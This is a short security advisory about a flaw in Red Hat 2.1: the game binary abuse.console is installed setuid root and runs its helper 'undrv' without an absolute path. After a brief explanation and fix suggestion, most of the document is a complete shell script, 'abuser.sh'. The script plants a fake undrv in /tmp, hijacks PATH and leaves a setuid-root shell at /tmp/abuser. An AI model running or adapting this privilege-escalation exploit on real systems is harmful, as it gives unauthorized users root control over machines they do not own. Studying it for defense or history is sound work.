COMMAND

    /usr/lib/games/abuse/abuse.console suid root

SYSTEMS AFFECTED

    Red Hat 2.1 linux distribution

PROBLEM

    There is a   security hole in   Red Hat 2.1,   which installs  the
    game  abuse,  /usr/lib/games/abuse/abuse.console  suid  root.  The
    abuse.console program loads its files without absolute  pathnames,
    assuming the user is  running abuse from the  /usr/lib/games/abuse
    directory.  One of these  files in the undrv program,  which abuse
    executes as root.  If the user is not in the abuse directory  when
    running this, an arbitrary  program can be substituted  for undrv,
    allowing  the  user  to  execute  arbitrary  commands as root.  If
    abuse.console needs  to be  run by  users other  than root  at the
    console, provisions  need to  be made  in the  code to not execute
    or load any files as root.

        #!/bin/sh
        #
        echo ================ abuser.sh - gain root on Linux Red Hat 2.1 system
        echo ================ Checking system vulnerability
        if test -u /usr/lib/games/abuse/abuse.console
        then
        echo ++++++++++++++++ System appears vulnerable.
        cd /tmp
        cat << _EOF_ > /tmp/undrv
        #!/bin/sh
        /bin/cp /bin/sh /tmp/abuser
        /bin/chmod 4777 /tmp/abuser
        _EOF_
        chmod +x /tmp/undrv
        PATH=/tmp
        echo ================ Executing Abuse
        /usr/lib/games/abuse/abuse.console
        /bin/rm /tmp/undrv
        if test -u /tmp/abuser
        then
        echo ++++++++++++++++ Exploit successful, suid shell located in /tmp/abuser
        else
        echo ---------------- Exploit failed
        fi
        else
        echo ---------------- This machine does not appear to be vulnerable.
        fi